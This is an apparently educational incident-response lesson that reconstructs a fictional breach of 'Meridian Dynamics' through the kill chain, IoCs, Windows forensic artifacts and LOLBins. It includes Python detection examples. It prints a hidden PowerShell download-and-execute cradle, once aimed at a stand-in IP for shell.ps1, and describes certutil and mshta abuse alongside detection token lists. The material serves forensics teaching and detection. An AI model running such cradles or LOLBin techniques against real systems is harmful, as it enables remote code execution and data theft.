"The Threat Within" — Kill Chain, Forensics, Detection
Ray Donovan needs a full incident briefing. Reconstruct the complete attack timeline using forensic evidence, kill chain analysis, and detection techniques.
The Kill Chain Model
Every cyberattack follows a pattern. In 2011, Lockheed Martin formalized this pattern into the Cyber Kill Chain — a sequence of stages that every attacker must progress through to achieve their objective. If you can break any link in the chain, you stop the attack.
The kill chain has seven stages. Here is each stage mapped to what the attacker did to Meridian Dynamics:
| Stage | Description | Meridian Breach |
|---|---|---|
| 1. Reconnaissance | Gather information about the target — network layout, users, services, vulnerabilities. | Connected to Guest WiFi (VLAN 99), discovered VLAN boundary bypass, performed LDAP enumeration against MD-DC01 to find the t.manning account. |
| 2. Initial Access | Gain a foothold — exploit a vulnerability, use stolen credentials, or social-engineer a user. | Brute-forced t.manning's password ("Meridian2023!") with 14 failed attempts, then authenticated with valid domain credentials. |
| 3. Execution | Run malicious code or commands on the target system. | Used RDP (Remote Desktop Protocol) to log into MD-WEB01 using t.manning's IT-Admins group membership. Executed commands on the server. |
| 4. Persistence | Establish mechanisms to maintain access even if the initial entry point is closed. | Created a scheduled task ("SystemHealthCheck") with a Base64-encoded PowerShell reverse shell running every 6 hours. Deployed a fake svchost.exe in C:\Users\Public\Downloads\. |
| 5. Lateral Movement | Move from the initial foothold to other systems to reach high-value targets. | From MD-WEB01, accessed the file server MD-FS01 — reaching both the Finance$ and Engineering shares. |
| 6. Collection | Gather and stage data for exfiltration. | Copied quarterly financials, IoT firmware source code, and employee records. Staged everything in C:\Windows\Temp\ as a compressed ZIP archive. |
| 7. Exfiltration | Extract the stolen data from the network to an external location. | Used the reverse shell's HTTPS C2 channel (port 443) to exfiltrate the ZIP archive, blending with legitimate web traffic. |
Indicators of Compromise (IoCs)
Indicators of Compromise (IoCs) are forensic artifacts that indicate a system has been breached. They are the digital fingerprints attackers leave behind. IoCs fall into three categories:
- File hashes — SHA256/MD5 hash of malicious files (e.g., the fake svchost.exe hash doesn't match Microsoft's legitimate version)
- File paths — Files in unusual locations (svchost.exe in C:\Users\Public\Downloads\ instead of C:\Windows\System32\)
- File names — Legitimate names used deceptively (svchost.exe, csrss.exe, lsass.exe in the wrong directory)
- IP addresses — External C2 server IP: 198.51.100.23
- Domains — Malicious domains used for command-and-control
- Ports/Protocols — Unexpected outbound HTTPS traffic from MD-WEB01 (a web server shouldn't be making outbound connections)
- Traffic patterns — Cross-VLAN traffic from Guest WiFi (VLAN 99) to Corp network (VLAN 40)
- Registry keys — Run keys and scheduled task entries created by the attacker
- Scheduled tasks — "SystemHealthCheck" task running a PowerShell reverse shell
- Processes — svchost.exe running from a user directory instead of System32
- Event logs — 14 failed logons (4625) followed by success (4624) for t.manning at 3:14 AM
Malware Analysis Basics
Static analysis examines a suspicious file without running it. It is safe and reveals a surprising amount of information:
| Technique | What It Reveals | Meridian Example |
|---|---|---|
| File Hash | Unique fingerprint. Compare against known-good hashes from Microsoft. | SHA256 of fake svchost.exe does NOT match the legitimate Microsoft hash. |
| Strings | Readable text embedded in the binary — URLs, IP addresses, commands. | Contains strings like "198.51.100.23", "shell.ps1", "DownloadString". |
| PE Headers | Portable Executable metadata — compilation timestamp, imports, sections. | Compilation timestamp doesn't match Microsoft build dates. No valid digital signature. |
| File Path | Where the file is located on disk. Legitimate system files have specific homes. | C:\Users\Public\Downloads\svchost.exe — wrong path! Real svchost lives in C:\Windows\System32\. |
| Digital Signature | Microsoft signs all legitimate system binaries with a code-signing certificate. | The fake svchost.exe has no valid signature, or a self-signed certificate. |
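The three static checks from the table (path, hash, strings) as one triage routine, as an added example that is not part of the original page. The two byte strings are constructed stand-ins for the legitimate and fake binaries, and the known-good hash is taken from the constructed legitimate copy rather than from Microsoft.

```python
import hashlib
import ntpath
import re

# Constructed sample bytes standing in for the two binaries (not real files):
# the "legitimate" copy carries only vendor text, the fake one carries the C2
# address and download primitive that strings analysis found on MD-WEB01.
LEGIT_BYTES = b"MZ\x90\x00" + b"\x00" * 32 + b"Microsoft Corporation\x00" + b"\x7f" * 8
FAKE_BYTES = (b"MZ\x90\x00" + b"\x00" * 16
              + b"https://198.51.100.23/shell.ps1\x00DownloadString\x00" + b"\x01\x02" * 8)

# Where well-known system binaries are expected to live (lower-cased for comparison).
EXPECTED_HOMES = {name: r"c:\windows\system32" for name in ("svchost.exe", "csrss.exe", "lsass.exe")}
SUSPICIOUS_STRINGS = ("DownloadString", "Net.WebClient", "IEX", "-EncodedCommand", "shell.ps1")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def extract_strings(data: bytes) -> list:
    """Equivalent of the 'strings' technique: runs of six or more printable ASCII bytes."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{6,}", data)]


def triage(path: str, data: bytes, known_good_sha256: str) -> list:
    """Apply the path, hash and strings checks; an empty list means nothing stood out."""
    findings = []
    name = ntpath.basename(path).lower()
    parent = ntpath.dirname(path).lower()
    home = EXPECTED_HOMES.get(name)
    if home and parent != home:
        findings.append(f"path: {name} found in {parent}, expected {home}")
    if sha256_hex(data) != known_good_sha256.lower():
        findings.append("hash: SHA256 does not match the known-good binary")
    for s in extract_strings(data):
        if IPV4.search(s) or any(tok.lower() in s.lower() for tok in SUSPICIOUS_STRINGS):
            findings.append(f"string: {s}")
    return findings


if __name__ == "__main__":
    for f in triage(r"C:\Users\Public\Downloads\svchost.exe", FAKE_BYTES, sha256_hex(LEGIT_BYTES)):
        print(f)
```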
Windows Forensic Artifacts
Windows is a forensic goldmine. Even when attackers try to cover their tracks, the OS records activity in dozens of places. Here are the key artifact categories:
| Event ID | Log | Meaning | Meridian Relevance |
|---|---|---|---|
| 4624 | Security | Successful logon | t.manning's successful logon after brute force |
| 4625 | Security | Failed logon | 14 failed attempts against t.manning at 3:14 AM |
| 4672 | Security | Special privileges assigned | t.manning got admin token due to IT-Admins membership |
| 4688 | Security | Process creation | Fake svchost.exe launched from wrong path |
| 4698 | Security | Scheduled task created | "SystemHealthCheck" task with PowerShell payload |
| 5140 | Security | Network share accessed | t.manning accessing Finance$ and Engineering shares |
| 1102 | Security | Audit log was cleared | Attacker attempted to clear the Security log |
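The 4625-then-4624 pattern from the table turned into detection logic, as an added example that is not part of the original page. The event records, the date and the source addresses are constructed sample data, not real MD-DC01 logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log sample (not real logs): fourteen 4625 failures for
# t.manning two seconds apart at 03:14, then a 4624 success from the same
# source, plus an ordinary user with one typo followed by a success.
SAMPLE_EVENTS = [
    {"time": f"2024-03-15T03:14:{s:02d}", "id": 4625, "user": "t.manning", "src": "10.99.0.42"}
    for s in range(0, 28, 2)
] + [
    {"time": "2024-03-15T03:14:30", "id": 4624, "user": "t.manning", "src": "10.99.0.42"},
    {"time": "2024-03-15T08:02:11", "id": 4625, "user": "j.doe", "src": "10.40.0.7"},
    {"time": "2024-03-15T08:02:20", "id": 4624, "user": "j.doe", "src": "10.40.0.7"},
]


def detect_bruteforce(events, threshold=10, window=timedelta(minutes=10)):
    """Alert when an account/source pair accumulates >= threshold 4625s inside
    `window` and then produces a 4624 while those failures are still in the
    window: failed-then-succeeded is the password-guessing signature."""
    failures = defaultdict(list)  # (user, src) -> timestamps of recent 4625s
    alerts = []
    for e in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(e["time"])
        key = (e["user"].lower(), e["src"])
        recent = [f for f in failures[key] if t - f <= window]
        if e["id"] == 4625:
            failures[key] = recent + [t]
        elif e["id"] == 4624:
            if len(recent) >= threshold:
                alerts.append({"user": e["user"], "src": e["src"],
                               "failures": len(recent), "success_at": e["time"]})
            failures[key] = []  # a success resets the counter for that pair
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_EVENTS):
        print(f"ALERT {a['user']} from {a['src']}: {a['failures']} failures, then success at {a['success_at']}")
```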
The registry records user and system activity in several places:
- ShellBags — Records every folder a user has ever browsed in Explorer. Even if files are deleted, the folder history remains.
- MRU (Most Recently Used) — Tracks recently opened files, typed paths, and search queries.
- USB History — HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR records every USB device ever connected.
- Run Keys — HKLM\Software\Microsoft\Windows\CurrentVersion\Run — programs that launch at startup. Attackers add persistence here.
NTFS keeps four timestamps for every file (the MACB set):
- Modified — When file content was last changed
- Accessed — When file was last read
- Changed (MFT) — When file metadata was last modified
- Born (Created) — When file was first created
Timestomping (faking timestamps) is a common anti-forensic technique, but the $MFT internal timestamps are harder to tamper with.
Prefetch: Windows caches information about recently executed programs in C:\Windows\Prefetch to speed up future launches. Each .pf file records the executable name, run count, last run time, and the files and directories the program touched. Even if an attacker deletes the malware, the Prefetch file may still prove it ran.
LOLBins — Living Off the Land
LOLBins (Living Off the Land Binaries) are legitimate Windows tools that attackers abuse to avoid detection. Because these binaries are signed by Microsoft and already present on every Windows machine, they bypass application whitelisting and don't trigger antivirus alerts.
| LOLBin | Legitimate Purpose | Attacker Abuse | Meridian Usage |
|---|---|---|---|
| powershell.exe | System administration and automation scripting | Download and execute payloads, run encoded commands, create reverse shells | Base64-encoded reverse shell: powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(...)" |
| certutil.exe | Certificate management utility | Download files from the internet, encode/decode Base64 data | Could be used instead of PowerShell for file download |
| mshta.exe | Execute HTML Application (.hta) files | Execute arbitrary scripts hosted on remote servers | Alternative execution method for payloads |
| rundll32.exe | Execute DLL functions | Run malicious DLLs, execute JavaScript via url.dll | Alternative persistence mechanism |
| schtasks.exe | Manage scheduled tasks | Create persistence through recurring tasks | Created "SystemHealthCheck" scheduled task |
The Meridian attacker used PowerShell with the -nop (no profile) and -w hidden (hidden window) flags to run a reverse shell that downloads and executes a remote script. The command was Base64-encoded to avoid simple string detection. The schtasks.exe utility was used to schedule this payload to run every 6 hours.
Detection: look for PowerShell command lines containing -EncodedCommand, -nop, -w hidden, IEX, DownloadString, or Net.WebClient. Windows Event ID 4104 (Script Block Logging) captures the decoded PowerShell commands, so Base64 encoding does not hide the payload from that log.
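Decoding an -EncodedCommand argument the way Script Block Logging would show it, then flagging the indicators listed above, as an added example that is not part of the original page. The sample script and command line are constructed from the strings the page already cites; the token list and the suspicion threshold are my own choices.

```python
import base64
import re

# The indicators named in the text; matched case-insensitively on both the raw
# command line and the decoded script.
SUSPICIOUS_TOKENS = ("-EncodedCommand", "-nop", "-w hidden", "IEX", "DownloadString", "Net.WebClient")
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """How PowerShell expects -EncodedCommand input: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if the command line carries no encoded argument."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline: str) -> dict:
    """Decode if needed, collect indicator hits, and call three or more hits suspicious."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + "\n" + (decoded or "")).lower()
    hits = sorted(tok for tok in SUSPICIOUS_TOKENS if tok.lower() in text)
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= 3}


if __name__ == "__main__":
    # Constructed sample built from the strings the analysis found (not the real payload).
    script = "IEX (New-Object Net.WebClient).DownloadString('https://198.51.100.23/shell.ps1')"
    cmd = "powershell -nop -w hidden -EncodedCommand " + encode_powershell(script)
    print(score_command(cmd))
```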
Kill Chain Diagram — Meridian Dynamics Breach (interactive diagram on the original page; its nodes, in kill chain order: LDAP Enum, Brute Force, MD-WEB01, Fake svchost.exe, Finance & Eng, ZIP in Temp, Port 443)
Evidence Map — Forensic Layers (interactive map on the original page showing the artifacts left behind at each forensic layer)
Attack Timeline Replay — The Meridian Dynamics Breach (interactive day-by-day replay of the 21-day attack on the original page, viewable from the attacker's perspective, the defender's perspective, or both)
Security Lab: Incident Forensics Briefing
- Run Get-FileHash on the suspicious svchost.exe to obtain its SHA256 hash, and compare it with the hash of the legitimate Microsoft binary.
- Run Get-Item on the same file and note its full path: is this where svchost.exe should live?